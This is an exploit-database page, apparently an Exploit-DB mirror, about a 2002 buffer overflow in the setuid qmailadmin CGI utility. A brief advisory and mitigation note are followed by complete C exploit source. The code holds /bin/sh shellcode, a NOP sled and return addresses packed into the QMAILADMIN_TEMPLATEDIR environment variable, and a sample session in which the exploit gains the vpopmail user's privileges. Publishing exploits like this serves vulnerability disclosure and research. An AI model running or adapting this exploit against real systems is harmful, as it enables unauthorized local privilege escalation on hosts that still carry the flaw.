header-logo
Suggest Exploit
vendor:
qmailadmin
by:
Thomas Cannon
7.2
CVSS
HIGH
Buffer Overflow
120 (Buffer Copy without Checking Size of Input)
CWE
Product Name: qmailadmin
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2002

qmailadmin Buffer Overflow Vulnerability

The qmailadmin utility, developed by Inter7, is vulnerable to a buffer overflow condition. It is meant to run as a CGI program and is typically installed setuid (owned by root on some systems, regular users on others). qmailadmin fails to implement adequate bounds checking when processing an environment variable, resulting in a buffer overrun condition. It is likely that this can be exploited by malicious local users to elevate privileges.

Mitigation:

Ensure that the qmailadmin utility is not installed with setuid privileges and that adequate bounds checking is implemented when processing environment variables.
Source

Exploit-DB raw data:

/*
source: https://www.securityfocus.com/bid/5404/info

The qmailadmin utility, developed by Inter7, is vulnerable to a buffer overflow condition. It is meant to run as a CGI program and is typically installed setuid (owned by root on some systems, regular users on others). qmailadmin fails to implement adequate bounds checking when processing an environment variable, resulting in a buffer overrun condition. 

It is likely that this can be exploited by malicious local users to elevate privileges.
*/

/* http://www.badc0ded.com (bug found by Thomas Cannon)
 / bash-2.05a$ ./qmailadmin-exp
 / Content-Type: text/html
 / $ id
 / uid=1000(dim) euid=89(vpopmail) gid=1000(dim) egid=89(vchkpw) groups=89(vchkpw), 1000(dim), 0(wheel)
 / $ 
*/


char shellcode[]=          /* 23 bytes                       */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x54"                 /* pushl   %esp                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x3b"             /* movb    $0x3b,%al              */
    "\xcd\x80"             /* int     $0x80                  */
;

main ()
{
   char buf[16000];
   int i;
   memset(buf,0,sizeof(buf));
   memset(buf,0x90,5977); 
   strcat(buf,shellcode);

   for (i=0;i<=2203;i++)
     strcat(buf,"\xd8\xef\x06\x08");   // lang_fs magic..
   strcat (buf,"\xf1\xcb\xbf\xbf");	// ret..
   setenv("QMAILADMIN_TEMPLATEDIR",buf);
   execlp("/usr/local/www/cgi-bin.default/qmailadmin/qmailadmin","qmailadmin",0);
   
   
}

Navigation

Suggest Exploit

Services By CQR